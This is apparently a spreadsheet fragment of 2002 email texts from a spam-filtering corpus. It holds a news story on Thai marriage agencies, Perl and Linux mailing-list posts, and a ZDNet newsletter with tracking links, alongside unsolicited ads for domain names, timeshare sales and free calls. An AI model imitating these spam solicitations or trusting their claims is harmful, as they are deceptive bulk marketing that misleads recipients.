 Clients then get to view catalogs and videos of hundreds of Thai women
 looking for a husband. If they like what they see they come to Bangkok.
 Clients are introduced to several women in chaperoned meetings in Lynch's
 office -- encounters that can often be awkward given mutual shyness and
 language problems.
 "We find that the gentlemen are usually just as nervous as the ladies,"
 Lynch said. "But once they start meeting the ladies they soon relax."
 After the first meeting, couples can decide to go on dates to get to know
 each other better. Within two weeks of arrival, Lynch says, almost every
 client has found a potential wife.
 "At the end of a fortnight it's very, very rare for a guy to go back and
 think he hasn't made his mind up," he said. In most cases, marriage follows,
 usually within the next year.
 Roongthip Kamchat, managing director of Thai No. 1 Connections, a
 Bangkok-based agency, says she has introduced about 1,000 couples, and less
 than 10 percent have broken up.
 Roongthip says she sometimes has a difficult time calming men who have just
 arrived in Bangkok looking for a wife.
 "Sometimes they are very nervous," she said. "And sometimes they are very
 impatient and say 'Give me a lady, I want to get married now.' I say: 'Calm
 down, OK, we'll talk."'
 But if men are really in a hurry, Roongthip says, she can find them a wife
 and get them married within a week. Lynch says clients he has found wives
 for include a blind man, a man with one leg and a man with post-traumatic
 stress disorder.
 WHY?
 Similar marriage agencies can be found in many developing countries. Critics
 say they thrive on the neediness of lonely Western men who are unable to
 form relationships in their own country, and on the desperation of
 impoverished women who believe they can find a better life in the West.
 But Moylan says that if the arrangement makes both partners happy, there is
 no reason to object. "If you talk about people who are needy, I think
 everybody wants someone to love them, and wants someone to love, so yes, I
 need Wan," he said.
 "Thai women are dissatisfied with life in Thailand. I think there's no
 secret there. They are looking for a better life. I don't have a problem
 with that. In return they are willing to give a lot of love and care to
 their future husband."
 Lynch says men are dissatisfied with Western women too, and that is why they
 choose to use his agency.
 His brochure promises an alternative to the "kind of de-feminized,
 over-sized, self-centered, mercenary-minded lady available on the British
 singles scene," and says he can make dreams come true even for men who are
 not "God's gift to women."
 Roongthip said many Western men found it difficult to meet women in their
 own countries -- and found Thai women attractive.
 "They don't know how to meet women. Even if they go to pubs or discotheques
 or restaurants or department stores, how can they ask people to marry them?
 Impossible," she said.
 "Many Thai girls are slim, have long hair, black eyes, small nose. They are
 good at taking care and joking and laughing, not strict. Different from
 ladies from other countries."
 Although many couples married through agencies have a considerable age gap,
 the agencies say this is not a problem. They say language problems are also
 not a major obstacle.
 "Thai ladies are not ageist, and they have no qualms whatsoever about having
 a husband who is significantly older," Lynch said. "When I met my wife she
 couldn't speak a word of English. We muddled along with a phonetic
 dictionary. The ladies are very keen to learn English and they pick it up
 very quickly."
 Many agencies also offer tuition for woman on what to expect when they move
 to the West.
 "We have kitchens, we have study classes," Roongthip said. "We teach them
 how to eat, and when to make tea."
 PITFALLS
 But not all dreams come true. "Bee" is a 26-year-old Thai woman who went to
 Switzerland two years ago with a man she met through an agency. Now she is
 back in Bangkok, sad and angry.
 "He had no friends, and I was so lonely," she said. "I tried to make him
 happy but he just wanted sex and somebody to keep his house clean. He never
 spoke to me."
 Bee came back to Bangkok earlier this year. "I thought I would be happy
 there," she said. "But it was the worst time of my life."
 Lynch says that while some agencies are badly run, he makes checks to ensure
 unsuitable candidates are weeded out.
 "We are ethical and professional," he said. "We will not take on all
 comers."
 Moylan says that despite possible pitfalls, his own marriage is proof the
 arrangement can work. Wan's sister has just signed up with Lynch's company,
 looking for a foreign husband.
 "Perhaps there are cases of women being exploited. I'm sure there are,"
 Moylan said. "But in the majority of cases the women get a good deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-08
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This Week on perl5-porters (30 September / 6 October 2002)
     * RATS
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (30 September / 6 October 2002)         |
 |   posted by rafael on Monday October 07, @07:12 (summaries)        |
 |   http://use.perl.org/article.pl?sid=02/10/07/1124226              |
 +--------------------------------------------------------------------+
 It was a busy week indeed, with long threads, interesting bugs, clever
 fixes, miscellaneous optimizations, some new ideas, a few jokes,
 mysterious failures, and, finally, a security hole. Read on.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/10/07/1124226
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/07/1124226
 +--------------------------------------------------------------------+
 | RATS                                                               |
 |   posted by KM on Monday October 07, @09:01 (news)                 |
 |   http://use.perl.org/article.pl?sid=02/10/07/132252               |
 +--------------------------------------------------------------------+
 Odud writes "RATS, the Rough Auditing Tool for Security, is a security
 auditing utility for C, C++, Python, Perl and PHP code. RATS scans source
 code, finding potentially dangerous function calls. The goal of this
 project is not to definitively find bugs. The current goal is to provide
 a reasonable starting point for performing manual security audits.
 Produced by [0]Secure Software" Uses a database so you can alter what you
 want it to look for. Not a replacement for using stricture or your head
 but is a good place to start some security auditing on your Perl.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/07/132252
 Links:
     0. http://www.securesoftware.com/rats.php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</si>
  <si>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new domain extensions are now affordable
</t>
  </si>
  <si>
    <t xml:space="preserve">.BIZ and .INFO Available Here
 Dear sir/madam,
 The Internet Corporation for Assigned Names and Numbers [ICANN] has recently approved the addition of new extensions to the internet domain space. The new domain names will offer much-needed competition in the domain market. Consumers will be able to choose from the following new extensions: .biz, .info, and .name
 The new top-level domain names are now available to the general public at the following address: http://www.interniconline.com. Priced at only $24.95, the best names are expected to be snapped up quickly so don't hesitate.
 Sincerely,
 Internic Online
 http://www.interniconline.com
 1202FFdi8-041VvDy1060QrFx3-446RpPn3326ChFp2-625zbFt8017TPMl55
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Quick Cash!
</t>
  </si>
  <si>
    <t xml:space="preserve">Sell your Timeshare!
 If you're interested in selling or renting
 your Timeshare or vacation membership
 we can help!
 For a free consultation click "reply" with
 your name, telephone number, and the
 name of the resort.  We will contact you
 shortly!
 Removal Instructions:
 To be removed from this list, please
 reply with "remove" in the subject line.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Mirror a website
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 This is driving me nuts. I'm trying to run a once off mirror of a
 website using wget. It's ignoring images and not recursing links (even
 though I've specified the --mirror flag).
 wget --mirror https://username:password@foobar.com/a/b/a/index.html
 Any ideas or alternative tools?
 ct
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Welcome to www.internationafreecall.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Thank you for signing up for the Internationalfreecall.com mailing list.
 Soon we will show you how to make free international and free domestic phone calls.
 The information on making free international calls will come after a short series of emails, so please wait a couple of days for the series of emails to arrive.  In the meantime, you can always opt-out at any time by clicking on the unsubscribe link at the bottom of each message.
 In addition, for those who qualified for our promotion, we will show you how to receive 160 minutes of free domestic calling.
 Finally, for our customers who order a flat-rate calling product and wish to market this, or another one of their own businesses, I will give a free automated email follow-up system with no catches (this is a $20.00 value!)
 More to come soon. Stay tuned!
 http://www.internationalfreecall.com
 To unsubscribe at any time, click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5587
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey, thief! This laptop is locked (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbwolvLGZP85eXsJh-PR"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href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dqeIkxCs3CyJqsjeorR"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19, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;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&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;&lt;a href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874762,00.html
 "&gt;
 &lt;b&gt;Hey, thief! This laptop is locked&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Try stealing my notebook and &lt;b&gt;Caveo Anti-Theft&lt;/b&gt; will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech. It's motion detection on a PC Card.&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPn901Hg3F-erCpGY9iR" &gt;
 &lt;b&gt;And it's virtually foolproof&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqzqmQb3Rl28NRQSnqQPR" &gt;&lt;b&gt;Also: Start-up has locks for Secure Notebook&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8BLS9sqDFWVhZSgRXBnR" &gt;Earnings: Breaking the bottom line&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oK_THHOiJGu_NEsnEuR" &gt;Feds set to enforce PC security&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPLR5LT53xlZk0f-IosR" &gt;Movement grows to boost Wi-Fi hot spots&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNyDzRJqwuBXvl3NU2FR" &gt;States may be blocking e-commerce&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04gwpdpSjaeTldfVpf4R" &gt;Microsoft's chief lawyer calls it quits&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDflOljAlXdIl9Oi-UiyR" &gt;Will Mac users pay for 'Mac experience'?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIpiRPkWr9i_f_B0NLnlR" &gt;HP in top PC slot--for now&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLJOcR9uvgWdT_pfmeDx04R"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Active Directory unbundled&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;B&gt;Microsoft&lt;/B&gt; will begin selling its directory technology as &lt;B&gt;a standalone product&lt;/B&gt; separate from Windows. The move could be seen as Microsoft's attempt to satisfy those that have accused the software giant of monopolistic practices for integrating a multitude of software into its operating system. &lt;B&gt;Sun&lt;/B&gt; and &lt;B&gt;Novell&lt;/B&gt; already offer so-called lightweight directory software, so Microsoft is joining an already thriving marketplace for products that store and manage information about users, computer systems and networking devices.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi82osHkvpmtTwxp6DtrR" &gt;&lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;How much do you build on Linux?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 A question for IT managers is whether &lt;B&gt;Linux&lt;/B&gt; is ready to move beyond file and Web servers to application and Web services servers. If &lt;B&gt;IBM, Oracle, BEA, Sun, HP&lt;/B&gt; and other vendors have a say, the answer is yes.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyIUqcd2fqfAgMcXeaiR" &gt;
 &lt;b&gt;Find out why&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://image.com.com/techupdate/i/amello.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;CRM's dirty little secret&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The goal of CRM is to reduce costs, increase revenues, and boost customer loyalty. But what if your &lt;B&gt;data is dirty&lt;/B&gt;? Tech Update's &lt;B&gt;Adrian Mello&lt;/B&gt; has tips on how companies can cut down on inaccurate and potentially damaging customer data.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI481hKwtTVomap_vCgSyiL4R" &gt;
 &lt;b&gt;Clean up your act&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Get your IT budgets approved&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 An experienced IT manager offers eight tips for getting budgets approved--plus a &lt;B&gt;sample budget&lt;/B&gt; that shows his recommendations in action.  Does your company have a five-year plan for its IT budget?
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N1z0pm5rNQ1U5MauO37xrR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="220" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071702_burkhardt_quote.gif" width="220" height="175" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;font size="+1"&gt;&lt;b&gt;How a CTO faced his worst nightmare
 &lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 After Sept. 11, investors worried whether the &lt;B&gt;stock market&lt;/B&gt; would quickly get back to business. &lt;B&gt;NYSE technology chief Roger Burkhardt&lt;/B&gt; was on the job faster than a trader can say "buy." But now Burkhardt and his technology team face a &lt;B&gt;new era of instability&lt;/B&gt; marked by fears of terrorist attacks, corporate accounting scandals, and a stock market meltdown. CNET News.com recently spoke with Burkhardt about the technology challenges the NYSE regularly faces because of the whipsaw movements of the stock market.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrPLwvBdgA8IeOdSKzjX1iR" &gt;
 &lt;b&gt;Read the full interview&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;In what business do we trust?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In response to my recent column, "&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij6jkp0x-EDvznhjonlZR" &gt;&lt;B&gt;Desperately seeking chief ethics officer&lt;/B&gt;&lt;/a&gt;," &lt;B&gt;David Boulton&lt;/B&gt; writes: "We are missing the point when we focus on the executives of corporations and miss the underlying ethic of business in general." Boulton asks how we can possibly trust institutions that reduce human beings "to assets whose behaviors are fair game to manipulate?"
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKnCnKw24YOLpk6Td6dR" &gt;
 &lt;b&gt;Read his call for a new ethic&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;!--&lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3Y3gjLZw3RXvLF34ULXuR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;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href="http://clickthru.online.com/Click?q=84-CCOyQ60FV7pnTgVZsihsBSWgp7yR"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href="http://clickthru.online.com/Click?q=9a-b6_GQTMpSkXOga7Figi7yr9FKgnR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;FEATURE&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874688,00.html
 "&gt;
 &lt;b&gt;New connections reshape the PC&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Big changes are coming in PC design. &lt;B&gt;Meta Group&lt;/B&gt; thinks enterprises should begin to plan how these changes will affect existing projects and purchasing plans.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature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href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874493,00.html
 "&gt;
 &lt;b&gt;The road to the real tech recovery&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Have falling stock prices and the tech meltdown got you down? &lt;B&gt;Eric Knorr&lt;/B&gt; argues that the road to the real tech recovery is paved with back-to-basics innovation.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download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href="http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2874679,00.html
 "&gt;
 &lt;b&gt;Gaga for Google? When results don't count&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 When Dan Farber's Web search on a leading IT exec came up almost empty, he was forced to rethink his use of search engines.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size="-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLp7D-RuHm7ydDX7NdmUVSeR" &gt;&lt;img src="http://www.zdnet.com/products/graphics/040802_monitors.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0WstJFBXj4kHF6q-jPexAyR" style="text-decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPspJIMR09ie23s1N87hJlR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDDxiWCQ9b0QzbMuLbLad4R" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxDMetnhKQcaLlAI6OrR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phmyODmTiMEyR1N675iR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNl3OHFkVdngyV7VDjSPR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKGJAvxjB-pz3F7_4EMIrdR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJxs_rx5CEYjKHbtbXYzHRR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=6d-e8plIDEzJCY9_-K7Bc1bJBykEmZR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK2G6nnWXl6gJLkjCXMZHnR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M2ZiQ709w3V0z6qjySJGeR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8nVpCldWfGJ0kSyVjyR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4l3FU2wiOPYOLipujlR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=d7-wkOZr8WPyhAJDv9rm34yf6pGyEJKARRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13zaauep1kOqFb2GVaGyR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqW38eVvurMPGPxZ6RlR"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href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIFyifJDblRuaBDxRU4R" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpGvgzkxwzk0xBfd-8WrR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7xPo6ieVXCHnpqL0wRR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcIiNDrcqm86ccJ_2d2ZR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZSr65FEzceCGFySNP8dR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqG3vHYq9IO3JewkhBpuR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmPV49e3r1yZeU_u_KnPR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CwylmrWLXZBXqONOVnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRpW4Kc5w8PF_jEuwteR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d5-p-Si-vLA49NYYEogRFir-4gvy9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Refinance Your Existing Mortgage
</t>
  </si>
  <si>
